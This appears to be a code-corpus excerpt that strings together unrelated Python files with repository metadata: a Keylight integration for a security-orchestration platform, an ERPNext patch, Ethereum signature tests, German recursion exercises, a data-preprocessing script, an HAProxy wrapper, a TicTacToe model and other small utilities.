fields = self._http_request('GET', '/ComponentService/GetFieldList', params=params)
field_names = {}
for field in fields:
field_names[str(field.get('Id'))] = field.get('Name')
update = datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
if len(field_map) == INTEGRATION_CONTEXT_SIZE:
min_time = update
min_component = ''
for component in field_map.keys():
updated = field_map.get(component).get('updated')
if parse_date_string(updated) < parse_date_string(min_time):
min_time = updated
min_component = component
field_map.pop(min_component)
field_map[str(component_id)] = {'fields': field_names,
'updated': update
}
demisto.setIntegrationContext(field_map)
@logger
def field_output_to_hr_fields(self, field_output: dict, component_id: str, returned_fields: list = None) -> dict:
'''
Args:
field_output: a dictionary of key,values that is the output of FieldValue field
component_id: What component the fields are from
returned_fields: A list of field names to return. If None - all fields returned
Returns:
'''
field_map = demisto.getIntegrationContext().get(str(component_id))
final_fields = {}
if not field_map:
self.update_field_integration_context(component_id)
field_map = demisto.getIntegrationContext().get(str(component_id))
fields = field_map.get('fields')
for field_dict in field_output:
field_key = field_dict.get('Key')
field_val = field_dict.get('Value')
if not fields.get(str(field_key)):
self.update_field_integration_context(component_id)
fields = demisto.getIntegrationContext().get(str(component_id)).get('fields')
field_name = fields.get(str(field_key))
if isinstance(field_val, dict) and field_val.get('DisplayName'):
field_val = {'Value': field_val.get('DisplayName'),
'ID': field_val.get('Id', -1)}
if not returned_fields or field_name in returned_fields:
final_fields[field_name] = field_val
return final_fields
@logger
def string_to_FieldValues(self, fields_json: Union[dict, list], component_id: str) -> list:
"""
Args:
field_json in the format:
[{
"fieldName": "Task ID",
"value": "1",
"isLookup": false
},
...
]
Returns:
returns the for right format (dynamicRecord) for creating and updating a record.
"""
key_val_return = []
for field in fields_json:
field_id = self.field_id_from_name(field.get('fieldName', ''), component_id)
value = field.get('value', '')
if not field_id:
raise ValueError(f'Could not find the field "{field.get("fieldName", "")}" in component {component_id}.')
if field.get('isLookup', ''):
key_val_return.append(
{
'Key': field_id,
'Value': {
'Id': value
}
}
)
else:
key_val_return.append({'Key': field_id, 'Value': value})
return key_val_return
'''HELPER FUNCTIONS'''
@logger
def create_filter(filter_type: str, filter_value: str, filter_field_id: str) -> dict:
"""
Args:
filter_type: What type of filter to apply on the field. out of FILTER_DICT
filter_value:
filter_field_id:
Returns:
A filter made from the arguments in the format keylight needs.
"""
# adding filter if exists
if not FILTER_DICT.get(filter_type):
raise ValueError('Filter Type is invalid.')
filter = {
"FieldPath": [int(filter_field_id)],
"FilterType": FILTER_DICT.get(filter_type),
'Value': filter_value
}
return filter
'''COMMAND FUNCTIONS'''
def get_component_command(client: Client, args: dict) -> None:
'''
Args:
client: The client
args: Demisto.args()
Returns:
A list of all components.
'''
if args.get('component_id'):
params = {'id': args.get('component_id')}
client.return_components('/ComponentService/GetComponent', params)
elif args.get('alias'):
params = {'alias': args.get('alias')}
client.return_components('/ComponentService/GetComponentByAlias', params)
else:
client.return_components('/ComponentService/GetComponentList')
def get_field_list_command(client: Client, args: dict) -> None:
params = {'componentId': args.get('component_id')}
client.return_fields('/ComponentService/GetFieldList', params,
f"Keylight fields for component {params.get('componentId')}:")
def get_field_command(client: Client, args: dict) -> None:
field_id = client.field_id_from_name(args.get('field_name', ''), args.get('component_id', ''))
params = {'id': field_id}
client.return_fields('/ComponentService/GetField', params,
f"Keylight field {params.get('id')}:")
def get_record_command(client: Client, args: dict) -> None:
path = '/ComponentService/GetDetailRecord' if args.get('detailed', "False") == "True" \
else '/ComponentService/GetRecord'
client.return_records(args.get('component_id', ''), args.get('record_id', ''), args.get('field_names', ''), path)
def get_records_command(client: Client, args: dict) -> None:
page_size = str(min(int(args.get('page_size', '10')), 100))
component_id = args.get('component_id', '')
page_index = args.get('page_index', "0")
filter_type = args.get('filter_type')
filter_value = args.get('filter_value', '')
field_name = args.get('filter_field_name', '')
returned_fields = argToList(args.get('returned_fields', ''))
filter_field_id = None
if filter_type and filter_value and field_name:
filter_field_id = client.field_id_from_name(field_name, component_id)
if not filter_field_id:
raise ValueError(f'Could not find the field "{field_name}" in component {component_id}.')
detailed = '/ComponentService/GetDetailRecords' if args.get('detailed', "False") == "True" \
else '/ComponentService/GetRecords'
res = client.return_filtered_records(component_id, page_size, page_index, detailed,
filter_type, filter_field_id, filter_value)
for record in res:
record['Fields'] = client.field_output_to_hr_fields(record.pop('FieldValues'), component_id, returned_fields)
ec = {'Keylight.Record(val.ID == obj.ID)': res}
title = f'Records for component {component_id}'
if filter_type:
title += f' \n### with filter "{filter_type}: {filter_value}" on field "{field_name}"'
records = []
for record in res:
temp_dict = record.get('Fields').copy()
for key in temp_dict.keys():
if isinstance(temp_dict[key], dict):
temp_dict[key] = temp_dict[key].get('Value')
temp_dict['Id'] = record.get("ID")
temp_dict['DisplayName'] = record.get('DisplayName')
records.append(temp_dict)
hr = tableToMarkdown(title, records)
# hr = f'# {title}\n'
# for record in res:
# hr += tableToMarkdown(f'Record {record.get("DisplayName", "")} (ID: {record.get("ID", "")}):',
# record.get("Fields"))
return_outputs(hr, ec, res)
def get_record_count_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
filter_type = args.get('filter_type', '')
filter_value = args.get('filter_value', '')
filter_field_name = args.get('filter_field_name', '')
data = {'componentId': component_id}
if not filter_type or not filter_value or not filter_field_name:
data['filters'] = []
else:
filter_field_id = client.field_id_from_name(filter_field_name, component_id)
if not filter_field_id:
raise ValueError('Could not find the field name.')
data['filters'] = [create_filter(filter_type, filter_value, filter_field_id)]
res = client._http_request('POST', '/ComponentService/GetRecordCount', json_data=data)
title = f'## There are **{res}** records in component {component_id}.\n'
if filter_type:
title += f'### with filter: "{filter_type} {filter_value}" on field `{filter_field_name}`'
return_outputs(title)
def get_record_attachments_command(client: Client, args: dict) -> None:
field_name = args.get('field_name', '')
record_id = args.get('record_id', '')
component_id = args.get('component_id', '')
field_id = client.field_id_from_name(field_name, component_id)
params = {'componentID': component_id,
'recordId': record_id,
'fieldId': field_id
}
res = client._http_request('GET', '/ComponentService/GetRecordAttachments', params=params)
for doc in res:
doc['FieldID'] = doc.pop("FieldId")
doc['DocumentID'] = doc.pop('DocumentId')
doc['RecordID'] = record_id
doc['ComponentID'] = component_id
if not res:
hr = f'## Field {field_id} in record {record_id} has no attachments.'
return_outputs(hr)
return
hr = tableToMarkdown(f'Field {field_name} in record {record_id} has the following attachments:', res)
ec = {'Keylight.Attachment(val.FieldID == obj.FieldID && val.DocumentID == obj.DocumentID)': res}
return_outputs(hr, ec, res)
def get_record_attachment_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
field_name = args.get('field_name', '')
record_id = args.get('record_id', '')
doc_id = args.get('document_id', '')
field_id = client.field_id_from_name(field_name, component_id)
params = {'componentID': component_id,
'recordId': record_id,
'fieldId': field_id,
'documentId': doc_id
}
res = client._http_request('GET', '/ComponentService/GetRecordAttachment', params=params)
demisto.results(fileResult(res.get("FileName", ""), base64.b64decode(res.get("FileData"))))
def delete_record_attachment_command(client: Client, args: dict) -> None:
field_id = args.get('field_id', '')
record_id = args.get('record_id', '')
doc_id = args.get('document_id', '')
component_id = args.get('component_id', '')
json_data = {
"componentId": component_id,
"dynamicRecord": {
"Id": record_id,
"FieldValues": [
{
"Key": field_id,
"value": [
{
"Id": doc_id
}
]
}
]
}
}
client._http_request('POST', '/ComponentService/DeleteRecordAttachments', json_data=json_data)
return_outputs("### Attachment was successfully deleted from the Documents field.")
def delete_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_id = args.get('record_id', '')
json_data = {
'componentId': component_id,
'recordId': record_id
}
client._http_request('DELETE', '/ComponentService/DeleteRecord', json_data=json_data)
return_outputs(f'### Record {record_id} of component {component_id} was deleted successfully.')
def get_lookup_report_column_fields_command(client: Client, args: dict) -> None:
field_path_id = args.get('field_path_id', '')
lookup_field_id = args.get('lookup_field_id', '')
params = {
'lookupFieldId': lookup_field_id,
'fieldPathId': field_path_id
}
res = client._http_request('GET', '/ComponentService/GetLookupReportColumnFields', params=params)
for rec in res:
rec['ID'] = rec.pop("Id")
rec['ComponentID'] = rec.pop("ComponentId")
ec = {'Keylight.LookupField(val.ID === obj.ID)': res}
hr = tableToMarkdown(f'Here is more information about field path {field_path_id}, lookup field {lookup_field_id}:',
res)
return_outputs(hr, ec, res)
def create_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_json = args.get('record_json', '{}').replace("'", '"')
record_json = json.loads(record_json)
client.change_record(component_id, record_json=record_json)
def update_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_id = args.get('record_id', '')
record_json = args.get('record_json', '{}').replace("'", '"')
record_json = json.loads(record_json)
client.change_record(component_id, record_id, record_json)
def get_user_by_id_command(client: Client, args: dict) -> None:
user_id = args.get('user_id', '')
res = client._http_request('GET', f'/SecurityService/GetUser?id={user_id}')
hr = tableToMarkdown(f'Keylight user {user_id}', res)
ec = {'Keylight.User(val.Id && val.Id==obj.Id)': res}
return_outputs(hr, ec, res)
def fetch_incidents(client: Client, args: dict) -> None:
name = demisto.params().get('component_name', '')
filter_field = demisto.params().get('filter_field', '')
page_size = str(min(int(demisto.params().get('fetch_limit', '50')), 50))
if not name or not filter_field:
raise ValueError("No component alias or field to filter by specified.")
last_fetch_time = demisto.getLastRun().get('last_fetch_time')
if not last_fetch_time:
now = datetime.now()
last_fetch = now - timedelta(days=120)
last_fetch_time = last_fetch.strftime("%Y-%m-%dT%H:%M:%S")
# Find component ID
component_id = demisto.getLastRun().get('component', {}).get(name)
if not component_id:
component_id = client.component_id_from_name(name)
if component_id == 'None':
raise ValueError("Could not find component name.")
field_id = demisto.getLastRun().get('field', {}).get(filter_field)
if not field_id:
field_id = client.field_id_from_name(filter_field, component_id)
if not field_id:
raise ValueError("Could not find field name.")
res = client.return_filtered_records(component_id, page_size, '0', '/ComponentService/GetDetailRecords',
'Greater Than', field_id, last_fetch_time)
incidents = []
max_fetch_time = last_fetch_time
for record in res:
record['Fields'] = client.field_output_to_hr_fields(record.pop('FieldValues'), component_id)
occurred_at = record.get('Fields', {}).get(filter_field, datetime.now().strftime("%Y-%m-%dT%H:%M:%S"))
incident = {'name': f'Keylight record {record.get("DisplayName")}',
'occurred': occurred_at.split('.')[0] + 'Z',
'rawJSON': json.dumps(record)
}
if datetime.strptime(occurred_at.split('.')[0], "%Y-%m-%dT%H:%M:%S") > \
datetime.strptime(max_fetch_time.split('.')[0], "%Y-%m-%dT%H:%M:%S"):
max_fetch_time = occurred_at
incidents.append(incident)
demisto.setLastRun({'last_fetch_time': max_fetch_time,
'component': {name: component_id},
'field': {filter_field: field_id}})
demisto.incidents(incidents)
def main():
params = demisto.params()
proxy = params.get('proxy')
verify = not params.get('insecure')
address = params.get('server', '').rstrip('/')
username = params.get('credentials', {}).get('identifier', '')
password = params.get('credentials', {}).get('password', '')
client = Client(address, verify, proxy, headers={'Accept': 'application/json'})
commands = {
'kl-get-component': get_component_command,
'kl-get-field-list': get_field_list_command,
'kl-get-field': get_field_command,
'kl-get-record-count': get_record_count_command,
'kl-get-record': get_record_command,
'kl-get-records': get_records_command,
'kl-delete-record': delete_record_command,
'kl-create-record': create_record_command,
'kl-update-record': update_record_command,
'kl-get-lookup-report-column-fields': get_lookup_report_column_fields_command,
'kl-get-record-attachment': get_record_attachment_command,
'kl-get-record-attachments': get_record_attachments_command,
'kl-delete-record-attachment': delete_record_attachment_command,
'kl-get-user-by-id': get_user_by_id_command,
'fetch-incidents': fetch_incidents,
}
LOG(f'Command being called is {demisto.command()}')
logged_in = False
try:
logged_in = client.login(username, password)
if logged_in:
if demisto.command() == 'test-module':
demisto.results('ok')
else:
commands[demisto.command()](client, demisto.args())
except Exception as e:
if not logged_in:
return_error(f"Could not connect to instance. Make sure your credentials are correct and haven't changed."
f" Error: {str(e)}")
else:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}',
error=traceback.format_exc())
finally:
if logged_in:
client.logout()
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 40.448584 | 121 | 0.591909 |
5092695b7d9a370914bff98c552a538045f77a9b
| 544 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype("Shipping Rule")
# default "calculate_based_on"
frappe.db.sql('''update `tabShipping Rule`
set calculate_based_on = "Net Weight"
where ifnull(calculate_based_on, '') = '' ''')
# default "shipping_rule_type"
frappe.db.sql('''update `tabShipping Rule`
set shipping_rule_type = "Selling"
where ifnull(shipping_rule_type, '') = '' ''')
| 28.631579 | 57 | 0.735294 |
50c9c6bdbfe7ced608c21a9e7ea3c4650da31a60
| 1,643 |
py
|
Python
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 64 |
2018-04-10T19:28:59.000Z
|
2020-11-10T02:56:57.000Z
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 2 |
2018-05-18T15:39:10.000Z
|
2018-12-17T19:00:50.000Z
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 9 |
2018-04-10T21:17:41.000Z
|
2019-12-10T11:42:34.000Z
|
import pytest
accounts = ['0xd0edc0d7073c2931edbadbdcab6b67ea4929a110', '0xa7183ed8bd8961a004f2213daa307386a49745d7', '0xa5b40bbbe0cc5f7f9ce2fae5aa0e3572a55bd02c']
messages = ['0123456789', '', 'test' * 100]
signatures = ['0xa03cdc8c0af5867cb0d97d0fd23ff54fc792c9537adcbd71148172b77b079336697d0a12245d8797e5266d2e81aa6908490bad393a950d0572c1a483fb4f26341c',
'0x40afe208deede24693c3e459e5d3a26013d2f0fa7322a2695e5a7dd70032917f56e7da6e44541432fa5c669ffcac95846e204e3624876a97b550703f69eb39bb1b',
'0xd3c8f0adf9782c251a31fbf1e83c5e4ab36940b59d5f175fb7ccbe89e5079d2c434eefa46d8d129f04ac15a6236f165debee07334898036262c36ef39247829a1b']
@pytest.fixture()
def libSignatures(chain):
return chain.provider.get_or_deploy_contract('LibSignatures')[0]
def add_prefix(message):
return '\x19Ethereum Signed Message:\n' + str(len(message)) + message
def prepare_message(web3, message):
return web3.toAscii(web3.sha3(web3.toHex(add_prefix(message))))
def generic_test_LibSignatures(libSignatures, account, message, signature, result):
assert libSignatures.call().verify(account, message, signature) == result
def test_LibSignatures_ok(web3, libSignatures):
for acc, mess, sig in zip(accounts, messages, signatures):
generic_test_LibSignatures(libSignatures, acc, prepare_message(web3, mess), web3.toAscii(sig), True)
def test_LibSignatures_wrong(web3, libSignatures):
wrong_accounts = accounts[1:] + [accounts[0]]
for acc, mess, sig in zip(wrong_accounts, messages, signatures):
generic_test_LibSignatures(libSignatures, acc, prepare_message(web3, mess), web3.toAscii(sig), False)
| 54.766667 | 149 | 0.805843 |
50df50eda3b643ac8bcf0c9cda477fd2025fa56c
| 576 |
py
|
Python
|
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | null | null | null |
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | null | null | null |
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | 2 |
2020-10-08T18:08:59.000Z
|
2020-10-29T19:53:34.000Z
|
# Element der Fibonacci-Folge berechnen:
def fib(n):
if n == 0: # f(0) = 0
return 0
elif n == 1: # f(1) = 1
return 1
else: # f(n) = f(n-1) + f(n-2)
return fib (n-1) + fib (n-2)
# Ackermann-Funktion berechnen:
def ack(m,n):
if m == 0: # A(0,n) = n+1
return n+1
elif n == 0: # A(m,0) = A(m-1,1)
return ack(m-1,1)
else: # A(m,n) = A(m-1,A(m,n-1))
return ack(m-1, ack(m,n-1))
# Hailstone-Folge ausgeben:
def hailstone(n):
print(n)
if n!=1:
if n % 2 == 0:
hailstone(n//2)
else:
hailstone(3*n+1)
| 21.333333 | 42 | 0.489583 |
50eea60012772a0765204d19167397bd12493503
| 2,710 |
py
|
Python
|
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | 1 |
2022-02-17T08:24:13.000Z
|
2022-02-17T08:24:13.000Z
|
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | null | null | null |
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Process the raw json data
Creates an easy-to-read in csv file from the raw json file by cutting off the curl header.
Writes a log file.
usage: python process_raw_json.py [date=yyyymmdd]
*author*: Johannes Röttenbacher
"""
import sys
sys.path.append(".")
from meteohautnah.helpers import read_command_line_args, make_dir
import os
import datetime as dt
import pandas as pd
import logging
def preprocess_json(file: str) -> pd.DataFrame:
"""Preprocess raw json file
Cut of curl message and remove brackets.
:param file: Full file path
:return: pandas DataFrame
"""
with open(file, "r") as f:
data = f.readlines()[13:][0][1:-1]
df = pd.read_json(data, lines=True)
return df
# setup file logger
logdir = "/projekt_agmwend/home_rad/jroettenbacher/meteo_hautnah/logs"
logfile = f"{logdir}/process_raw_json.log"
logger = logging.getLogger(__name__)
handler = logging.FileHandler(logfile)
formatter = logging.Formatter('%(asctime)s : %(levelname)s - %(message)s', datefmt="%c")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
# standard options
yesterday = dt.datetime.now() - dt.timedelta(days=1)
date_var = yesterday.strftime("%Y%m%d")
# read in command line args to overwrite standard options
args = read_command_line_args()
date_var = args["date"] if "date" in args else date_var
logger.info(f"Preprocessing {date_var}")
date_str = dt.datetime.strptime(date_var, "%Y%m%d").strftime("%Y-%m-%d")
indir = f"/projekt_agmwend2/data_raw/meteorologie_hautnah_raw/{date_str}"
outdir = f"/projekt_agmwend/data/meteorologie_hautnah/daily_csv"
files = os.listdir(indir) # list all files
if len(files) > 1:
df = pd.concat([preprocess_json(f"{indir}/{f}") for f in files]) # preprocess files and concatenate them
elif len(files) == 0:
logger.info(f"No data found for {date_str}")
sys.exit(1)
else:
df = preprocess_json(f"{indir}/{files[0]}")
df["lo"] = df["lo"].astype(str) # convert location column to string
df["lo"] = df["lo"].str.slice(1, -1) # slice of brackets
df[["lon", "lat"]] = df["lo"].str.split(', ', expand=True) # split location into lon and lat column
df.drop(["lo"], axis=1, inplace=True) # drop original location column
header = dict(a="altitude", H="humidity", s="speed", HDX="humidex", time="time", P="pressure", T0="air_temperature",
td="dewpoint", tag="device_id", L="luminocity", lon="lon", lat="lat")
df = df.rename(columns=header)
# reorder columns
df = df[[h for h in header.values()]]
outfile = f"{outdir}/{date_str}_meteotracker.csv"
df.to_csv(outfile, index=None) # save data to csv without an index column
logger.info(f"Saved {outfile}")
| 35.194805 | 116 | 0.708118 |
e8698df111a68f01d5c37731ccf036b2bec97361
| 1,883 |
py
|
Python
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 63 |
2018-02-04T03:31:22.000Z
|
2022-03-07T08:27:39.000Z
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 103 |
2017-10-28T02:25:41.000Z
|
2019-02-26T05:09:58.000Z
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 40 |
2018-01-22T16:31:16.000Z
|
2022-03-08T04:40:42.000Z
|
#!/usr/bin/env python3
import os
import sys
import time
import errno
import logging
logger = logging.getLogger('haproxy_wrapper')
logger.setLevel(getattr(logging, 'DEBUG'))
formatter = logging.Formatter("%(asctime)-15s %(name)s: %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(formatter)
logger.addHandler(consoleHandler)
def create_haproxy_pipe():
logger.debug("create_haproxy_pipe called")
pipefd = os.pipe()
os.set_inheritable(pipefd[0], True)
os.set_inheritable(pipefd[1], True)
logger.debug("create_haproxy_pipe done")
return pipefd
def close_and_swallow(fd):
logger.debug("close_and_swallow called")
try:
os.close(fd)
logger.debug("close_and_swallow successful")
except OSError as e:
# swallow
logger.debug("close_and_swallow swallow OSError: %s", e)
pass
def wait_on_haproxy_pipe(pipefd):
logger.debug("wait_on_haproxy_pipe called")
try:
ret = os.read(pipefd[0], 1)
if len(ret) == 0:
close_and_swallow(pipefd[0])
close_and_swallow(pipefd[1])
logger.debug("wait_on_haproxy_pipe done (False)")
return False
except OSError as e:
logger.debug("wait_on_haproxy_pipe OSError: %s", e)
if e.args[0] != errno.EINTR:
close_and_swallow(pipefd[0])
close_and_swallow(pipefd[1])
logger.debug("wait_on_haproxy_pipe done (False)")
return False
logger.debug("wait_on_haproxy_pipe done (True)")
return True
pipefd = create_haproxy_pipe()
pid = os.fork()
if not pid:
os.environ["HAPROXY_WRAPPER_FD"] = str(pipefd[1])
# Close the read side
os.close(pipefd[0])
os.execv(sys.argv[1], sys.argv[1:])
# Close the write side
os.close(pipefd[1])
while wait_on_haproxy_pipe(pipefd):
time.sleep(0.005)
sys.exit(0)
| 26.521127 | 69 | 0.671269 |
fa1a394f877b55fa9c7bcce4dc1d11c44c129af4
| 794 |
py
|
Python
|
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
class Device:
def __init__(self, name, ise_id, address, device_type):
self.name = name
self.ise_id = ise_id
self.address = address
self.device_type = device_type
def get_name(self):
return self.name
def get_ise_id(self):
return self.ise_id
def get_address(self):
return self.address
def get_device_type(self):
return self.device_type
def is_id_in_channels(self, ise_id):
if ise_id in self.channels:
return True
else:
return False
def tostring(self):
return "device: {0:40} | ise_id: {1:4} | address: {2:14} | device_type: {3:10}".format(self.name, self.ise_id, self.address, self.device_type)
def __str__(self):
return self.tostring()
| 25.612903 | 150 | 0.61335 |
0f190d6ef7fbc7028e6bb74b7c3cbf074ee64e4b
| 2,269 |
py
|
Python
|
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
from enum import Enum
class Pos(Enum):
OBEN_LINKS = "oben links"
OBEN_MITTE = "oben mitte"
OBEN_RECHTS = "oben rechts"
MITTE_LINKS = "mitte links"
MITTE_MITTE = "mitte mitte"
MITTE_RECHTS = "mitte rechts"
UNTEN_LINKS = "unten links"
UNTEN_MITTE = "unten mitte"
UNTEN_RECHTS = "unten rechts"
class Belegung(Enum):
FREI = "Frei"
KREIS = "Kreis"
KREUZ = "Kreuz"
class Zustand(Enum):
OK = "Alles in Ordnung."
NICHT_ERLAUBT = "Der Zug ist nicht erlaubt."
KREUZ_GEWINNT = "Das Spiel ist beendet. Kreuz gewinnt!"
KREIS_GEWINNT = "Das Spiel ist beendet. Kreis gewinnt!"
UNENTSCHIEDEN = "Das Spiel ist beendet. Unentschieden!"
KREIS_IST_AM_ZUG = "Kreis ist am Zug."
KREUZ_IST_AM_ZUG = "Kreuz ist am Zug."
class TicTacToe:
def __init__(self, ausgabe):
self._ausgabe = ausgabe
self._ausgabe.zeichne_spielfeld()
self._spielfeld = { feld: Belegung.FREI for feld in Pos }
def setze(self, pos, symbol):
""" Setze ein Symbol (Belegung.KREUZ, Belegung.Kreis), wenn es die
Spielregeln erlauben. Speichere die Belegung des Spielfeldes,
rufe die entsprechende Ausgabe-Funktion auf und gib Zustand.OK oder
Zustand.NICHT_ERLAUBT zurück.
"""
return Zustand.OK
def pruefe_auf_unentschieden(self):
"""
Gibt True zurück, wenn die laufende Partie unentschieden zu ende
gegangen ist.
"""
return False
def pruefe_auf_gewonnen(self, symbol):
"""
Gibt True zurück, wenn das angefragte Symbol (Belegung.KREUZ oder
Belegung.Kreis) gewonnen hat.
"""
return False
def zustand(self):
"""
gibt zurück, in welchem Zustand sich das Spiel gerade befindet
(ein Element von Zustand, z. B. Zustand.KREUZ_IST_AM_ZUG)
"""
return Zustand.NICHT_ERLAUBT
def laeuft(self):
""" gibt True zurück, wenn das Spiel noch läuft, sonst False """
return self.naechster_zug() != None
def naechster_zug(self):
"""
gib Zustand.KREUZ_IST_AM_ZUG oder Zustand.KREIS_IST_AM_ZUG
oder None zurück
"""
return None
| 29.467532 | 75 | 0.622301 |
cbb9526226b658bbb982a45df025171999de12ba
| 550 |
py
|
Python
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 123 |
2019-11-21T12:55:04.000Z
|
2022-03-23T08:08:47.000Z
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 334 |
2019-11-20T10:40:08.000Z
|
2022-03-27T17:33:01.000Z
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 41 |
2020-01-16T17:24:52.000Z
|
2022-03-28T13:09:59.000Z
|
from django.core.management.base import BaseCommand
from wagtail_localize.models import LocaleSynchronization
from wagtail_localize.synctree import PageIndex
class Command(BaseCommand):
help = "Synchronises the structure of all locale page trees so they contain the same pages. Creates alias pages where necessary."
def handle(self, **options):
page_index = PageIndex.from_database().sort_by_tree_position()
for locale_sync in LocaleSynchronization.objects.all():
locale_sync.sync_trees(page_index=page_index)
| 39.285714 | 133 | 0.78 |
38611f4a20238a311fb1421d35eaf1c368e17738
| 14,242 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2014-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file implausibleRoutes.py
# @author Jakob Erdmann
# @date 2017-03-28
"""
Find routes that are implausible due to:
- being longer than the shortest path between the first and last edge
- being longer than the air-distance between the first and the last edge
The script computes an implausibility-score from configurable factors and
reports all routes above the specified threshold.
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from optparse import OptionParser
import subprocess
